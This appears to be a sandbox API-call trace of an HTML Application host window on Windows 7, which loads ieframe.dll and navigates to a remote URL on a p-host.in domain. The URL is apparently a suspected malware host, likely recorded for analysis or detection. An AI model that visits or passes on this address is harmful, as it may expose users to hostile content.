[0064.151] OffsetRect (in: lprc=0x3c9078, dx=0, dy=0 | out: lprc=0x3c9078) returned 1
[0064.151] OffsetRect (in: lprc=0x3c9088, dx=0, dy=0 | out: lprc=0x3c9088) returned 1
[0064.151] RegisterClassExW (param_1=0x2aef20) returned 0xc199
[0064.151] CoCreateInstance (in: rclsid=0x7fee0f37850*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x7fee0f2b760*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7fee1044320 | out: ppv=0x7fee1044320*=0x405ba0) returned 0x0
[0064.225] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x405ba0, aaClassList=0x2af0a0*=0xc199, uSize=0x1) returned 0x0
[0064.225] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc199, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x101fa, hMenu=0x0, hInstance=0x7fee0880000, lpParam=0x3bd780) returned 0x10206
[0064.225] GetWindowLongW (hWnd=0x10206, nIndex=-20) returned 0
[0064.226] SetWindowLongPtrW (hWnd=0x10206, nIndex=-21, dwNewLong=0x3bd780) returned 0x0
[0064.242] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x81, wParam=0x0, lParam=0x2aea90*=3921792, plResult=0x2ae850 | out: plResult=0x2ae850) returned 0x1
[0064.242] NtdllDefWindowProc_W () returned 0x1
[0064.243] GetCurrentThreadId () returned 0xbc4
[0064.243] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.243] GetCurrentThreadId () returned 0xbc4
[0064.243] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.243] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x1, wParam=0x0, lParam=0x2aea90*=3921792, plResult=0x2ae850 | out: plResult=0x2ae850) returned 0x1
[0064.243] NtdllDefWindowProc_W () returned 0x0
[0064.243] GetCurrentThreadId () returned 0xbc4
[0064.243] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.243] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x2ae8d0 | out: plResult=0x2ae8d0) returned 0x1
[0064.243] NtdllDefWindowProc_W () returned 0x0
[0064.243] GetCurrentThreadId () returned 0xbc4
[0064.243] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.243] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x2ae8d0 | out: plResult=0x2ae8d0) returned 0x1
[0064.243] NtdllDefWindowProc_W () returned 0x0
[0064.243] GetCurrentThreadId () returned 0xbc4
[0064.244] GetClassNameW (in: hWnd=0x101fa, lpClassName=0x2af0b0, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34
[0064.244] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1
[0064.244] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x405ba0, fRestoreLayout=1) returned 0x0
[0064.244] SendMessageW (hWnd=0x10206, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3
[0064.244] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.244] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x2aee80 | out: plResult=0x2aee80) returned 0x1
[0064.244] NtdllDefWindowProc_W () returned 0x3
[0064.244] GetCurrentThreadId () returned 0xbc4
[0064.244] IntersectRect (in: lprcDst=0x2af340, lprcSrc1=0x3c9078, lprcSrc2=0x3c9088 | out: lprcDst=0x2af340) returned 1
[0064.244] EqualRect (lprc1=0x2af340, lprc2=0x3c9078) returned 1
[0064.244] InvalidateRect (hWnd=0x10206, lpRect=0x0, bErase=1) returned 1
[0064.246] IntersectRect (in: lprcDst=0x2af1d0, lprcSrc1=0x2af1d0, lprcSrc2=0x2af140 | out: lprcDst=0x2af1d0) returned 1
[0064.246] IntersectRect (in: lprcDst=0x2af1d0, lprcSrc1=0x2af1d0, lprcSrc2=0x2af140 | out: lprcDst=0x2af1d0) returned 1
[0064.247] GetCurrentThreadId () returned 0xbc4
[0064.247] GetCurrentThreadId () returned 0xbc4
[0064.247] GetCurrentThreadId () returned 0xbc4
[0064.249] IntersectRect (in: lprcDst=0x2aef50, lprcSrc1=0x2aef50, lprcSrc2=0x2aef20 | out: lprcDst=0x2aef50) returned 1
[0064.249] IntersectRect (in: lprcDst=0x417300, lprcSrc1=0x417300, lprcSrc2=0x2aef40 | out: lprcDst=0x417300) returned 1
[0064.255] SetWindowPos (hWnd=0x10206, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1
[0064.255] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.255] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x46, wParam=0x0, lParam=0x2af340*=66054, plResult=0x2af130 | out: plResult=0x2af130) returned 0x1
[0064.255] NtdllDefWindowProc_W () returned 0x0
[0064.255] GetCurrentThreadId () returned 0xbc4
[0064.255] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.255] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x47, wParam=0x0, lParam=0x2af340*=66054, plResult=0x2af130 | out: plResult=0x2af130) returned 0x1
[0064.255] NtdllDefWindowProc_W () returned 0x0
[0064.255] GetCurrentThreadId () returned 0xbc4
[0064.255] SetTimer (hWnd=0x10206, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0064.285] GetFocus () returned 0x0
[0064.285] EnumChildWindows (hWndParent=0x10206, lpEnumFunc=0x7fee09de450, lParam=0x2af0b0) returned 0
[0064.285] GetFocus () returned 0x0
[0064.285] SetFocus (hWnd=0x10206) returned 0x0
[0064.323] NtdllDefWindowProc_W () returned 0x0
[0064.327] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.327] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x7fef22f0000
[0064.330] GetProcAddress (hModule=0x7fef22f0000, lpProcName="LresultFromObject") returned 0x7fef22f3aa8
[0064.330] LresultFromObject () returned 0xc11f
[0064.350] GetCurrentThreadId () returned 0xbc4
[0064.398] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.398] GetKeyState (nVirtKey=1) returned 0
[0064.398] GetKeyState (nVirtKey=2) returned 0
[0064.398] GetKeyState (nVirtKey=16) returned 0
[0064.398] GetKeyState (nVirtKey=17) returned 0
[0064.398] GetKeyState (nVirtKey=4) returned 0
[0064.398] GetKeyState (nVirtKey=18) returned 0
[0064.398] GetMessageTime () returned 0
[0064.398] GetMessagePos () returned 0x0
[0064.398] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x2ae620 | out: plResult=0x2ae620) returned 0x0
[0064.399] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.399] GetKeyState (nVirtKey=1) returned 0
[0064.399] GetKeyState (nVirtKey=2) returned 0
[0064.399] GetKeyState (nVirtKey=16) returned 0
[0064.399] GetKeyState (nVirtKey=17) returned 0
[0064.399] GetKeyState (nVirtKey=4) returned 0
[0064.399] GetKeyState (nVirtKey=18) returned 0
[0064.399] GetMessageTime () returned 0
[0064.399] GetMessagePos () returned 0x0
[0064.399] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x2adc80 | out: plResult=0x2adc80) returned 0x0
[0064.399] GetCurrentThreadId () returned 0xbc4
[0064.399] GetCurrentThreadId () returned 0xbc4
[0064.399] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.400] GetKeyState (nVirtKey=1) returned 0
[0064.400] GetKeyState (nVirtKey=2) returned 0
[0064.400] GetKeyState (nVirtKey=16) returned 0
[0064.400] GetKeyState (nVirtKey=17) returned 0
[0064.400] GetKeyState (nVirtKey=4) returned 0
[0064.400] GetKeyState (nVirtKey=18) returned 0
[0064.400] GetMessageTime () returned 0
[0064.400] GetMessagePos () returned 0x0
[0064.400] GetCursorPos (in: lpPoint=0x2aea00 | out: lpPoint=0x2aea00*(x=724, y=422)) returned 1
[0064.400] ScreenToClient (in: hWnd=0x10206, lpPoint=0x2aea00 | out: lpPoint=0x2aea00) returned 1
[0064.400] GetKeyState (nVirtKey=16) returned 0
[0064.400] GetKeyState (nVirtKey=17) returned 0
[0064.400] GetKeyState (nVirtKey=18) returned 0
[0064.400] GetKeyState (nVirtKey=160) returned 0
[0064.400] GetKeyState (nVirtKey=162) returned 0
[0064.400] GetKeyState (nVirtKey=164) returned 0
[0064.400] GetCursorPos (in: lpPoint=0x2aea00 | out: lpPoint=0x2aea00*(x=724, y=422)) returned 1
[0064.400] ScreenToClient (in: hWnd=0x10206, lpPoint=0x2aea00 | out: lpPoint=0x2aea00) returned 1
[0064.400] GetKeyState (nVirtKey=16) returned 0
[0064.400] GetKeyState (nVirtKey=17) returned 0
[0064.400] GetKeyState (nVirtKey=18) returned 0
[0064.400] GetKeyState (nVirtKey=160) returned 0
[0064.400] GetKeyState (nVirtKey=162) returned 0
[0064.400] GetKeyState (nVirtKey=164) returned 0
[0064.400] GetCapture () returned 0x0
[0064.401] GetCurrentThreadId () returned 0xbc4
[0064.401] GetCurrentThreadId () returned 0xbc4
[0064.401] GetCurrentThreadId () returned 0xbc4
[0064.401] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x2aeda0 | out: plResult=0x2aeda0) returned 0x1
[0064.401] NtdllDefWindowProc_W () returned 0x0
[0064.401] GetCurrentThreadId () returned 0xbc4
[0064.401] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x405ba0, hWnd=0x10206, phIMC=0x2af268 | out: phIMC=0x2af268*=0xc0195) returned 0x0
[0064.401] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x405ba0, hWnd=0x10206, hIME=0x0, phPrev=0x2af270 | out: phPrev=0x2af270*=0xc0195) returned 0x0
[0064.401] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.401] GetKeyState (nVirtKey=1) returned 0
[0064.401] GetKeyState (nVirtKey=2) returned 0
[0064.401] GetKeyState (nVirtKey=16) returned 0
[0064.401] GetKeyState (nVirtKey=17) returned 0
[0064.401] GetKeyState (nVirtKey=4) returned 0
[0064.401] GetKeyState (nVirtKey=18) returned 0
[0064.401] GetMessageTime () returned 0
[0064.401] GetMessagePos () returned 0x0
[0064.401] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x2aed90 | out: plResult=0x2aed90) returned 0x0
[0064.401] GetCurrentThreadId () returned 0xbc4
[0064.402] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.402] GetKeyState (nVirtKey=1) returned 0
[0064.402] GetKeyState (nVirtKey=2) returned 0
[0064.402] GetKeyState (nVirtKey=16) returned 0
[0064.402] GetKeyState (nVirtKey=17) returned 0
[0064.402] GetKeyState (nVirtKey=4) returned 0
[0064.402] GetKeyState (nVirtKey=18) returned 0
[0064.402] GetMessageTime () returned 0
[0064.402] GetMessagePos () returned 0x0
[0064.402] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x2aed90 | out: plResult=0x2aed90) returned 0x0
[0064.402] GetCurrentThreadId () returned 0xbc4
[0064.402] IsOS (dwOS=0x25) returned 1
[0064.402] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2af078 | out: phkResult=0x2af078*=0x3f0) returned 0x0
[0064.402] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2af080 | out: phkResult=0x2af080*=0x3fc) returned 0x0
[0064.402] RegOpenKeyExW (in: hKey=0x3fc, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x2af008 | out: phkResult=0x2af008*=0x0) returned 0x2
[0064.402] RegOpenKeyExW (in: hKey=0x3f0, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x2af008 | out: phkResult=0x2af008*=0x404) returned 0x0
[0064.402] SHRegGetValueW () returned 0x0
[0064.402] RegCloseKey (hKey=0x404) returned 0x0
[0064.402] RegCloseKey (hKey=0x0) returned 0x6
[0064.402] RegCloseKey (hKey=0x0) returned 0x6
[0064.402] RegCloseKey (hKey=0x3f0) returned 0x0
[0064.402] RegCloseKey (hKey=0x3fc) returned 0x0
[0064.402] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x7fef2350000
[0064.411] GetVersionExW (in: lpVersionInformation=0x2aeb30*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2aeb30*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0064.411] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x7fef2350000
[0064.411] LoadStringW (in: hInstance=0x7fef2350000, uID=0xb5, lpBuffer=0x2af1b0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0064.428] LoadStringW (in: hInstance=0x7fef2350000, uID=0xb5, lpBuffer=0x2af260, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0064.428] LoadStringW (in: hInstance=0x7fef2350000, uID=0xb5, lpBuffer=0x2af230, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0064.428] ShowWindow (hWnd=0x10206, nCmdShow=1) returned 1
[0064.428] GetMessageW (in: lpMsg=0x2af6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2af6c0) returned 1
[0064.428] TranslateMessage (lpMsg=0x2af6c0) returned 0
[0064.428] DispatchMessageW (lpMsg=0x2af6c0) returned 0x0
[0064.428] RegisterDragDrop (hwnd=0x10206, pDropTarget=0x7fee1042728) returned 0x0
[0064.429] GetCurrentThreadId () returned 0xbc4
[0064.429] GetCurrentThreadId () returned 0xbc4
[0064.429] GetCurrentThreadId () returned 0xbc4
[0064.429] GetCurrentThreadId () returned 0xbc4
[0064.429] GetMessageW (in: lpMsg=0x2af6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2af6c0) returned 1
[0064.430] NtdllDefWindowProc_W () returned 0x0
[0064.430] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.430] GetParent (hWnd=0x10206) returned 0x101fa
[0064.430] GetParent (hWnd=0x101fa) returned 0x5001c
[0064.430] GetParent (hWnd=0x5001c) returned 0x0
[0064.430] PostMessageW (hWnd=0x10206, Msg=0x491, wParam=0x0, lParam=0x0) returned 1
[0064.430] GetKeyState (nVirtKey=1) returned 0
[0064.430] GetKeyState (nVirtKey=2) returned 0
[0064.430] GetKeyState (nVirtKey=16) returned 0
[0064.430] GetKeyState (nVirtKey=17) returned 0
[0064.430] GetKeyState (nVirtKey=4) returned 0
[0064.430] GetKeyState (nVirtKey=18) returned 0
[0064.430] GetMessageTime () returned 128108
[0064.430] GetMessagePos () returned 0x1a602d4
[0064.430] GetCursorPos (in: lpPoint=0x2aee70 | out: lpPoint=0x2aee70*(x=724, y=422)) returned 1
[0064.430] ScreenToClient (in: hWnd=0x10206, lpPoint=0x2aee70 | out: lpPoint=0x2aee70) returned 1
[0064.430] GetKeyState (nVirtKey=16) returned 0
[0064.430] GetKeyState (nVirtKey=17) returned 0
[0064.430] GetKeyState (nVirtKey=18) returned 0
[0064.430] GetKeyState (nVirtKey=160) returned 0
[0064.430] GetKeyState (nVirtKey=162) returned 0
[0064.430] GetKeyState (nVirtKey=164) returned 0
[0064.430] GetCursorPos (in: lpPoint=0x2aee70 | out: lpPoint=0x2aee70*(x=724, y=422)) returned 1
[0064.430] ScreenToClient (in: hWnd=0x10206, lpPoint=0x2aee70 | out: lpPoint=0x2aee70) returned 1
[0064.430] GetKeyState (nVirtKey=16) returned 0
[0064.430] GetKeyState (nVirtKey=17) returned 0
[0064.430] GetKeyState (nVirtKey=18) returned 0
[0064.430] GetKeyState (nVirtKey=160) returned 0
[0064.430] GetKeyState (nVirtKey=162) returned 0
[0064.430] GetKeyState (nVirtKey=164) returned 0
[0064.430] GetCapture () returned 0x0
[0064.430] GetCurrentThreadId () returned 0xbc4
[0064.430] GetCurrentThreadId () returned 0xbc4
[0064.431] GetCurrentThreadId () returned 0xbc4
[0064.431] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0064.431] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x2af210 | out: plResult=0x2af210) returned 0x1
[0064.431] NtdllDefWindowProc_W () returned 0x0
[0064.431] GetCurrentThreadId () returned 0xbc4
[0064.431] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.431] GetKeyState (nVirtKey=1) returned 0
[0064.431] GetKeyState (nVirtKey=2) returned 0
[0064.431] GetKeyState (nVirtKey=16) returned 0
[0064.431] GetKeyState (nVirtKey=17) returned 0
[0064.431] GetKeyState (nVirtKey=4) returned 0
[0064.431] GetKeyState (nVirtKey=18) returned 0
[0064.431] GetMessageTime () returned 128108
[0064.431] GetMessagePos () returned 0x1a602d4
[0064.431] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x2aea90 | out: plResult=0x2aea90) returned 0x0
[0064.431] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.431] GetKeyState (nVirtKey=1) returned 0
[0064.431] GetKeyState (nVirtKey=2) returned 0
[0064.431] GetKeyState (nVirtKey=16) returned 0
[0064.431] GetKeyState (nVirtKey=17) returned 0
[0064.431] GetKeyState (nVirtKey=4) returned 0
[0064.431] GetKeyState (nVirtKey=18) returned 0
[0064.431] GetMessageTime () returned 128108
[0064.431] GetMessagePos () returned 0x1a602d4
[0064.431] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x2ae0f0 | out: plResult=0x2ae0f0) returned 0x0
[0064.431] GetCurrentThreadId () returned 0xbc4
[0064.431] GetCurrentThreadId () returned 0xbc4
[0064.431] TranslateMessage (lpMsg=0x2af6c0) returned 0
[0064.431] DispatchMessageW (lpMsg=0x2af6c0) returned 0x0
[0064.431] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.431] GetAncestor (hwnd=0x10206, gaFlags=0x2) returned 0x101fa
[0064.431] IsIconic (hWnd=0x101fa) returned 0
[0064.431] GetCurrentThreadId () returned 0xbc4
[0064.431] GetMessageW (in: lpMsg=0x2af6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2af6c0) returned 1
[0064.431] TranslateMessage (lpMsg=0x2af6c0) returned 0
[0064.431] DispatchMessageW (lpMsg=0x2af6c0) returned 0x0
[0064.431] GetCurrentThreadId () returned 0xbc4
[0064.431] GetMessageW (in: lpMsg=0x2af6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2af6c0) returned 1
[0064.431] TranslateMessage (lpMsg=0x2af6c0) returned 0
[0064.431] DispatchMessageW (lpMsg=0x2af6c0) returned 0x0
[0064.431] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0064.431] KillTimer (hWnd=0x10206, uIDEvent=0x1000) returned 1
[0064.431] IUnknown:AddRef (This=0x3aee60) returned 0x11
[0064.432] IUri:GetScheme (in: This=0x3aee60, pdwScheme=0x2ae828 | out: pdwScheme=0x2ae828*=0x2) returned 0x0
[0064.437] IUri:GetDisplayUri (in: This=0x3aee60, pbstrDisplayString=0x2ae850 | out: pbstrDisplayString=0x2ae850*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0064.437] GetWindowTextW (in: hWnd=0x101fa, lpString=0x2ae3a0, nMaxCount=512 | out: lpString="") returned 0
[0064.437] SetWindowTextW (hWnd=0x101fa, lpString="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 1
[0064.437] IUnknown:Release (This=0x3aee60) returned 0x10
[0064.437] GetCurrentThreadId () returned 0xbc4
[0064.437] GetMessageW (in: lpMsg=0x2af6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2af6c0) returned 1
[0064.743] TranslateMessage (lpMsg=0x2af6c0) returned 0
[0064.743] DispatchMessageW (lpMsg=0x2af6c0) returned 0x0
[0064.743] GetMessageW (in: lpMsg=0x2af6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2af6c0) returned 1
[0066.808] TranslateMessage (lpMsg=0x2af6c0) returned 0
[0066.808] DispatchMessageW (lpMsg=0x2af6c0) returned 0x0
[0066.809] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x2adcd0 | out: ppURI=0x2adcd0*=0x3aee60) returned 0x0
[0066.809] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2adca0 | out: ppvObject=0x2adca0*=0x3aee60) returned 0x0
[0066.809] IUnknown:Release (This=0x3aee60) returned 0x12
[0066.809] IUnknown:AddRef (This=0x3aee60) returned 0x13
[0066.809] IUnknown:Release (This=0x3aee60) returned 0x12
[0066.809] IUnknown:Release (This=0x3aee60) returned 0x11
[0066.809] FindResourceW (hModule=0x7fef2350000, lpName=0x1fe, lpType=0x6) returned 0x3a484d0
[0066.809] LoadResource (hModule=0x7fef2350000, hResInfo=0x3a484d0) returned 0x3a6e53c
[0066.809] LockResource (hResData=0x3a6e53c) returned 0x3a6e53c
[0066.809] VirtualQuery (in: lpAddress=0x3a6e53c, lpBuffer=0x2aee00, dwLength=0x30 | out: lpBuffer=0x2aee00*(BaseAddress=0x3a6e000, AllocationBase=0x3790000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30
[0066.809] SizeofResource (hModule=0x7fef2350000, hResInfo=0x3a484d0) returned 0xe6
[0066.809] GetMessageW (in: lpMsg=0x2af6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2af6c0) returned 1
[0066.994] TranslateMessage (lpMsg=0x2af6c0) returned 0
[0066.994] DispatchMessageW (lpMsg=0x2af6c0) returned 0x0
[0066.995] GetMessageW (in: lpMsg=0x2af6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2af6c0) returned 1
[0067.013] TranslateMessage (lpMsg=0x2af6c0) returned 0
[0067.013] DispatchMessageW (lpMsg=0x2af6c0) returned 0x0
[0067.013] GetMessageW (in: lpMsg=0x2af6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2af6c0) returned 1
[0067.055] TranslateMessage (lpMsg=0x2af6c0) returned 0
[0067.055] DispatchMessageW (lpMsg=0x2af6c0) returned 0x0
[0067.055] GetTickCount () returned 0x2006d
[0067.056] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x2aef40 | out: ppu=0x2aef40) returned 0x0
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.057] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.058] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
[0067.059] GetTickCount () returned 0x2006d
